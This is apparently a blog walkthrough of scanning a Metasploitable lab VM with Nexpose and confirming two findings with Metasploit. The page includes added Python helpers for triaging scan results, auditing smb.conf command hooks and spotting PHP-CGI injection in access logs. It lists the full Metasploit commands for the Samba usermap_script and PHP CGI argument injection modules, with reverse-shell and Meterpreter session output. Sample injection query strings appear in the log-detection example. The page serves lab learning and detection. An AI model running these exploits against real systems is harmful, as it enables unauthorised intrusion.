information gathering – nexpose

Nexpose Community Edition is a free vulnerability scanner, a single-user version of the award-winning Rapid7 Nexpose Enterprise solution.

Installed for testing on BackTrack 5 R3. Note that you may require different packages than I did; during the install it told me what I required.
Just note down any it asks for and then apt-get install (package).

Also, it will ask for 8GB of RAM (an insane request! I gave it 4GB and it works).

1. Install the packages which are required to run NeXpose (you may require others; it will tell you what you need as you install).
root@bt:~# apt-get install libstdc++5

2. Download Nexpose Community Edition from http://www.rapid7.com/vulnerability-scanner.jsp (32bit or 64bit linux version)

3. Make the .bin executable.
root@bt:~# chmod +x NeXposeSetup-Linux32.bin

4. Run the installer.
root@bt:~/NeXpose# ./NeXposeSetup-Linux32.bin

5. Follow the instructions on the screen to install Nexpose.

6. Log in at https://localhost:3780/

It installs in the directory /opt/rapid7/nexpose.

Results

Tested against a Metasploitable virtual machine (VirtualBox): https://myexploit.wordpress.com/web-application-metasploitable/

Screenshot of the results, filtered to show all Metasploit exploits. (All but two proved to be false positives.)
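The screenshot workflow (filter the scan to findings with a Metasploit module, then check each one by hand and record which were false positives) can be driven from a scan export instead of the UI. The following is an added example, not code from the post or from Rapid7. The XML is a constructed sample whose element and attribute names are assumptions loosely modelled on Nexpose's XML export, not a guaranteed match for the real schema, so adjust the tag names for a real export; the third finding and its module name are placeholders. The worklist records, per host/module pair, whether manual verification confirmed the finding, which is how an "all but two were false positives" figure gets tracked.

```python
import xml.etree.ElementTree as ET

# Constructed sample, loosely modelled on a Nexpose XML export. Element and
# attribute names are assumptions for this example, not the real schema.
# The third vulnerability and its module link are placeholders.
SAMPLE_REPORT = """<?xml version="1.0"?>
<NexposeReport version="2.0">
  <nodes>
    <node address="192.168.56.101" status="alive">
      <tests>
        <test id="samba-usermap-script" status="vulnerable-version"/>
        <test id="php-cgi-arg-injection" status="vulnerable-version"/>
        <test id="example-finding-3" status="vulnerable-version"/>
        <test id="http-old-server-banner" status="vulnerable-version"/>
        <test id="ssh-weak-kex" status="not-vulnerable"/>
      </tests>
    </node>
  </nodes>
  <VulnerabilityDefinitions>
    <vulnerability id="samba-usermap-script" title="Samba username map script command execution" severity="10">
      <exploits><exploit type="metasploit" link="exploit/multi/samba/usermap_script"/></exploits>
    </vulnerability>
    <vulnerability id="php-cgi-arg-injection" title="PHP CGI Argument Injection" severity="10">
      <exploits><exploit type="metasploit" link="exploit/multi/http/php_cgi_arg_injection"/></exploits>
    </vulnerability>
    <vulnerability id="example-finding-3" title="Constructed placeholder finding" severity="7">
      <exploits><exploit type="metasploit" link="exploit/example/placeholder_module"/></exploits>
    </vulnerability>
    <vulnerability id="http-old-server-banner" title="Outdated web server banner" severity="4"/>
    <vulnerability id="ssh-weak-kex" title="SSH weak key exchange" severity="5"/>
  </VulnerabilityDefinitions>
</NexposeReport>
"""

# Test statuses that count as a positive finding (e.g. vulnerable-version,
# vulnerable-exploited); anything else is dropped from the worklist.
VULNERABLE_PREFIX = "vulnerable"


def load_definitions(root):
    """Map vulnerability id -> (title, severity, [metasploit module links])."""
    defs = {}
    for vuln in root.iter("vulnerability"):
        modules = [e.get("link") for e in vuln.iter("exploit") if e.get("type") == "metasploit"]
        defs[vuln.get("id")] = (vuln.get("title"), int(vuln.get("severity", "0")), modules)
    return defs


def metasploit_worklist(xml_text):
    """Return the findings Nexpose ties to a Metasploit module, one row per
    host/module pair, highest severity first. This is the 'filter to show all
    Metasploit exploits' view as data rather than a screenshot."""
    root = ET.fromstring(xml_text)
    defs = load_definitions(root)
    rows = []
    for node in root.iter("node"):
        host = node.get("address")
        for test in node.iter("test"):
            if not test.get("status", "").startswith(VULNERABLE_PREFIX):
                continue
            title, severity, modules = defs.get(test.get("id"), ("?", 0, []))
            for module in modules:
                rows.append({"host": host, "vuln_id": test.get("id"), "title": title,
                             "severity": severity, "module": module, "verified": None})
    rows.sort(key=lambda r: -r["severity"])  # stable sort keeps export order within a severity
    return rows


def apply_verification(rows, confirmed_modules):
    """Record the outcome of manual verification on each row and return
    (confirmed, false_positives). confirmed_modules is the set of module names
    that actually worked against the host."""
    confirmed = 0
    for row in rows:
        row["verified"] = row["module"] in confirmed_modules
        confirmed += int(row["verified"])
    return confirmed, len(rows) - confirmed


if __name__ == "__main__":
    worklist = metasploit_worklist(SAMPLE_REPORT)
    for row in worklist:
        print(f"{row['host']}  sev {row['severity']:>2}  {row['module']}  ({row['title']})")
    # In the post, only the two modules shown later actually worked.
    print(apply_verification(worklist, {"exploit/multi/samba/usermap_script",
                                        "exploit/multi/http/php_cgi_arg_injection"}))
```

The false-positive count is the number worth reporting back: a scanner finding with a Metasploit module attached is a hypothesis, and the worklist is only closed when every row has a True or False in its `verified` column.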

[Screenshot: Results]

Below, clicking on the Samba MS-RPC Shell link shows the exploit description; you can then search for this in Metasploit manually.

[Screenshot: Results-2]

Manual search demonstration and exploit.

msf > search Samba "username map script" Command Execution

Matching Modules
================

Name                                Disclosure Date          Rank       Description
----                                ---------------          ----       -----------
exploit/multi/samba/usermap_script  2007-05-14 00:00:00 UTC  excellent  Samba "username map script" Command Execution

msf > use exploit/multi/samba/usermap_script

msf exploit(usermap_script) > set lhost 192.168.56.102

msf exploit(usermap_script) > set rhost 192.168.56.101

msf exploit(usermap_script) > set PAYLOAD generic/shell_reverse_tcp

msf exploit(usermap_script) > exploit

[*] Started reverse handler on 192.168.56.102:4444
[*] Command shell session 1 opened (192.168.56.102:4444 -> 192.168.56.101:60636) at 2012-12-10 12:19:50 +0000

ls -l
total 89
drwxr-xr-x 2 root root 4096 May 13 2012 bin
drwxr-xr-x 4 root root 1024 May 13 2012 boot
lrwxrwxrwx 1 root root 11 Apr 28 2010 cdrom -> media/cdrom
drwxr-xr-x 14 root root 13480 Dec 10 06:25 dev
drwxr-xr-x 95 root root 4096 Dec 10 06:25 etc
drwxr-xr-x 6 root root 4096 Apr 16 2010 home
drwxr-xr-x 2 root root 4096 Mar 16 2010 initrd
lrwxrwxrwx 1 root root 32 Apr 28 2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x 13 root root 4096 May 13 2012 lib
drwx------ 2 root root 16384 Mar 16 2010 lost+found
drwxr-xr-x 4 root root 4096 Mar 16 2010 media
drwxr-xr-x 3 root root 4096 Apr 28 2010 mnt
-rw------- 1 root root 14473 Dec 10 06:25 nohup.out
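The Samba finding above is a configuration issue rather than a code bug: the `username map script` parameter tells smbd to run an external command, which is why the module works against Metasploitable and why the fix on a real host is to remove or lock down that setting. The following is an added example, not code from the post or from the Samba project: it parses an smb.conf (a constructed sample, with made-up paths) and lists every parameter that makes smbd execute a command, generalising from the one option named on the page to Samba's other command hooks. The parameter names in `COMMAND_HOOKS` are real smb.conf options.

```python
import configparser
import io

# Constructed smb.conf fragment for the example. The "username map script"
# line mirrors the setting behind the Samba finding above; the paths are made up.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)
   security = user
   username map script = /etc/samba/scripts/mapusers.sh
   # hook that runs a command when a share is connected
   root preexec = /usr/local/bin/mount-helper %U

[homes]
   comment = Home Directories
   browseable = no

[public]
   path = /srv/public
   guest ok = yes
"""

# Real smb.conf parameters that make smbd run an external command. Any of them
# deserves review, because client-supplied data (such as a username) can end up
# on that command line.
COMMAND_HOOKS = {
    "username map script", "add user script", "delete user script",
    "add machine script", "root preexec", "root postexec",
    "preexec", "postexec", "magic script", "panic action",
}


def parse_smb_conf(text):
    """Parse smb.conf with configparser. The file is INI-like: '#' and ';'
    comments, keys containing spaces, occasionally repeated keys (hence
    strict=False), and Samba macros such as %U (hence interpolation=None)."""
    parser = configparser.ConfigParser(strict=False, interpolation=None)
    parser.read_file(io.StringIO(text))
    return parser


def find_command_hooks(text):
    """Return [(section, parameter, value)] for every configured command hook,
    in file order. An empty list means no command-executing parameter is set."""
    parser = parse_smb_conf(text)
    hits = []
    for section in parser.sections():
        for key, value in parser.items(section):
            if key.strip().lower() in COMMAND_HOOKS:
                hits.append((section, key.strip(), value.strip()))
    return hits


if __name__ == "__main__":
    for section, key, value in find_command_hooks(SAMPLE_SMB_CONF):
        print(f"[{section}] {key} = {value}")
```

Run it against `/etc/samba/smb.conf` on each Samba host in scope; a non-empty result is what turns the scanner's version-based guess into a confirmed configuration finding, and an empty one is grounds for marking it a false positive.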

And the other working exploit

msf > search PHP CGI Argument Injection

Matching Modules
================

Name                                      Disclosure Date          Rank       Description
----                                      ---------------          ----       -----------
exploit/multi/http/php_cgi_arg_injection  2012-05-03 00:00:00 UTC  excellent  PHP CGI Argument Injection

msf > use exploit/multi/http/php_cgi_arg_injection

msf exploit(php_cgi_arg_injection) > set lhost 192.168.56.102

msf exploit(php_cgi_arg_injection) > set rhost 192.168.56.101

msf exploit(php_cgi_arg_injection) > exploit

[*] Started reverse handler on 192.168.56.102:4444
[*] Sending stage (39217 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.102:4444 -> 192.168.56.101:59982) at 2012-12-10 12:24:49 +0000

meterpreter > shell
Process 5183 created.
Channel 0 created.
ls -l
total 72
drwxrwxrwt 2 root root 4096 May 20 2012 dav
drwxr-xr-x 8 www-data www-data 4096 May 20 2012 dvwa
-rw-r--r-- 1 www-data www-data 891 May 20 2012 index.php
drwxr-xr-x 10 www-data www-data 4096 May 14 2012 mutillidae
drwxr-xr-x 11 www-data www-data 4096 May 14 2012 phpMyAdmin
-rw-r--r-- 1 www-data www-data 19 Apr 16 2010 phpinfo.php
drwxr-xr-x 3 www-data www-data 4096 May 14 2012 test
drwxrwxr-x 22 www-data www-data 20480 Apr 19 2010 tikiwiki
drwxrwxr-x 22 www-data www-data 20480 Apr 16 2010 tikiwiki-old
drwxr-xr-x 7 www-data www-data 4096 Apr 16 2010 twiki
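From a detection angle, the PHP CGI argument injection above leaves a distinctive trace in the web server's access log: the query string looks like a command-line option (it begins with `-` and a letter) rather than the usual key=value pairs, because that is what php-cgi misinterprets as an argument. The following is an added example, not code from the post: it parses Apache combined-format log lines and flags option-like query strings after URL-decoding. The log lines, addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed Apache combined-format log lines. Lines 2 and 4 have the shape of
# a php-cgi argument injection attempt (option-like query string); 1 and 3 are
# ordinary requests and must not be flagged.
SAMPLE_LOG = """\
192.168.56.102 - - [10/Dec/2012:12:24:40 +0000] "GET /index.php HTTP/1.1" 200 891 "-" "Mozilla/5.0"
192.168.56.102 - - [10/Dec/2012:12:24:49 +0000] "POST /index.php?-d+display_errors%3d1 HTTP/1.1" 200 0 "-" "Mozilla/4.0"
192.168.56.102 - - [10/Dec/2012:12:25:01 +0000] "GET /mutillidae/index.php?page=home.php HTTP/1.1" 200 3412 "-" "Mozilla/5.0"
192.168.56.102 - - [10/Dec/2012:12:25:07 +0000] "GET /phpinfo.php?-s HTTP/1.1" 200 19 "-" "curl/7.22"
"""

# Combined log format: client, identd, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# A decoded query string that starts like a command-line switch. Requiring a
# letter after the dash avoids matching things like "?-1" or "?--".
ARG_LIKE = re.compile(r"^-[A-Za-z]")


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_query(target):
    """Extract the query string from a request target and decode it the way a CGI
    layer would see it ('+' to space, then percent-decoding)."""
    query = urlsplit(target).query
    return unquote(query.replace("+", " "))


def find_cgi_arg_injection(log_text):
    """Return one record per request whose decoded query string looks like a
    command-line option. Path is not restricted to .php, since php-cgi may be
    mapped to other extensions; narrow it if that is too noisy for a site."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        decoded = decode_query(rec["target"])
        if ARG_LIKE.match(decoded):
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "method": rec["method"],
                         "target": rec["target"], "query": decoded, "status": rec["status"]})
    return hits


if __name__ == "__main__":
    for hit in find_cgi_arg_injection(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['method']} {hit['target']} -> query {hit['query']!r}")
```

A hit with a 200 status against a host running php-cgi is the log-side confirmation of the scanner's finding; the same check run over historical logs tells you whether the server was probed before the scan.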
